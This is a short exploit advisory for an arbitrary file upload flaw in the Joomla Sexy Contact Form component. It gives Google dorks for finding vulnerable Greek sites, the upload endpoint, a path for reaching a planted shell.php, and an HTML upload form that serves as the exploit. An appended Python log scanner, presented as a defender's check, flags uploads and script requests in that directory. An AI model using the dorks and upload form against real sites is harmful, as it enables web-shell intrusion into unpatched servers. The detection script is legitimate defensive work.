
Joomla Sexy contact form Arbitrary File Upload Vulnerability

Author: KkK1337, Published: 08-11-2014

Google Dork: "/components/com_sexycontactform/" site:gr

Google Dork: "Powered by sexycontact" site:gr

Google Dork: inurl:"sexy-contact-form" site:gr

Exploit : components/com_sexycontactform/fileupload/index.php

Shell Access : http://www.[target].com/components/com_sexycontactform/fileupload/files/shell.php

HTML Upload Source:

<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
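
A defender's check for the two paths named in this advisory, as an added example that is not part of the original advisory: it scans web-server access logs for POSTs to the upload handler and for requests to script-like files in the upload directory. The combined log format, the extension list, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the advisory text above.
UPLOAD_ENDPOINT = "/components/com_sexycontactform/fileupload/index.php"
UPLOAD_DIR = "/components/com_sexycontactform/fileupload/files/"
# Extensions a server may hand to PHP (assumed list; adjust to the server's handler config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.IGNORECASE)
# Apache/nginx "combined" access-log format (assumption).
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')

def normalize(uri):
    """Drop the query string, percent-decode, collapse repeated slashes."""
    return re.sub(r"/{2,}", "/", unquote(uri.split("?", 1)[0]))

def scan(lines):
    """Return (kind, client_ip, path, status) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, method, uri, status = m.groups()
        path = normalize(uri)
        if method == "POST" and path.startswith(UPLOAD_ENDPOINT):
            findings.append(("upload", ip, path, int(status)))
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path.rsplit("/", 1)[-1]):
            # Also catches double extensions such as name.php.jpg.
            findings.append(("script-request", ip, path, int(status)))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Nov/2014:10:01:02 +0000] "POST /components/com_sexycontactform//fileupload/index.php/ HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.7 - - [08/Nov/2014:10:01:09 +0000] "GET /components/com_sexycontactform/fileupload/files/shell.php HTTP/1.1" 200 15 "-" "-"',
    '192.0.2.10 - - [08/Nov/2014:10:05:00 +0000] "GET /components/com_sexycontactform/fileupload/files/photo.jpg HTTP/1.1" 200 52144 "-" "-"',
    '192.0.2.10 - - [08/Nov/2014:10:06:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9000 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "script-request" finding with a 200 status is the signal to inspect the files/ directory on disk and to review the preceding "upload" entries from the same client.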
